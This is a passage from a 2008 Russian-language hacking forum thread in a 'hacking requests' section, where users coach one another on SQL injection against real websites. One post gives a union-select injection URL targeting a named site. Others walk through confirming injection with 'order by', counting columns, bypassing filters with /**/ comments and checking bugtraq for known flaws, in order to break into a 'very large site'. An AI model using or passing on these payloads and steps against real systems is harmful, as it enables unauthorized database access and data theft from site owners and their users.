HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #181  
Старый 01.02.2008, 16:52
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Код:
http://x-time.ru/cgi-bin/sonnik.cgi?act=char&val=%22+union+select+1,2+FROM+TABLE/*
т.е. в место TABLE перебираешь возможные варианты
 

  #182  
Старый 01.02.2008, 17:07
2rist
Новичок
Регистрация: 05.01.2008
Сообщений: 6
Провел на форуме:
95091

Репутация: 3
Отправить сообщение для 2rist с помощью ICQ
По умолчанию

159932 и it's my, спасибо за помощь.
 

  #183  
Старый 02.02.2008, 15:04
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
Smile

host/index.php?id='

выдает :

Код:
Тип ошибки:  Невозможно выполнить запрос.
Текст запроса:  SELECT * FROM cats WHERE id=\'
Ошибка mysql:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
это скуль ?)
 

  #184  
Старый 02.02.2008, 15:25
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

не всегда, открой страницу с существующим id и подставь
+order+by+150/* а потом
+order+by+1/* и если есть разница между отображаемыми страницами, то это точно скуль
 

  #185  
Старый 02.02.2008, 18:04
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
Smile

Цитата:
Сообщение от vp$  
не всегда, открой страницу с существующим id и подставь
+order+by+150/* а потом
+order+by+1/* и если есть разница между отображаемыми страницами, то это точно скуль
host/index.php?id=1588+order+by+150/*
Код:
Тип ошибки:  Невозможно выполнить запрос.
Текст запроса:  SELECT * FROM cats WHERE pid=1588 order by 150/*
Ошибка mysql:  Unknown column '150' in 'order clause'
host/index.php?id=1588+order+by+1/*
Выдает страницу с id=1588
=\
Насколько понятно - скуль есть , но только количество полей подобрать не могу
 

  #186  
Старый 02.02.2008, 22:06
bobob
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454

Репутация: 142
По умолчанию

давай линк на сайт, глянем
 

  #187  
Старый 05.02.2008, 21:11
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
Smile

Цитата:
Сообщение от bobob  
давай линк на сайт, глянем
не могу очень крупный сайт )
лан ... буду розбираться )
 

  #188  
Старый 05.02.2008, 22:47
A2GIL
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909

Репутация: 200
Отправить сообщение для A2GIL с помощью ICQ
По умолчанию

Цитата:
Выдает страницу с id=1588
=\Насколько понятно - скуль есть , но только количество полей подобрать не могу
_-Ramos-_, у самого такое несолько раз бывало!Иногда спасал обход фильтрации типа /**/.
Еще попробуй через and (example: ?id=1588/**/and/**/1=2/**/order/)

Последний раз редактировалось A2GIL; 05.02.2008 в 22:49..
 

  #189  
Старый 05.02.2008, 23:25
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Что за фигню все пишете тут? Ramos, попробуй host/index.php?id=1588 и host/index.php?id=1589-1
Если страницы совпадают - есть инъекция. Если нет - то инъекции нет, а может быть, параметр расценивается как строка и там фильтр.

ЗЫ если учесть то, какая ошибка тебе вылетела - скуль есть. С помощью order by подбираешь количество столбцов в запросе, потом с помощью union и циферок находишь где выводятся эти столбцы, ну и реализуешь.

Последний раз редактировалось Macro; 05.02.2008 в 23:30..
 

  #190  
Старый 05.02.2008, 23:59
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

_-Ramos-_ ты лучше определи что это за скрипт такой, может известный скрипт, а потом дуй на багтракю смотреть скуль- поверь так больше шансов что не будет облома
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ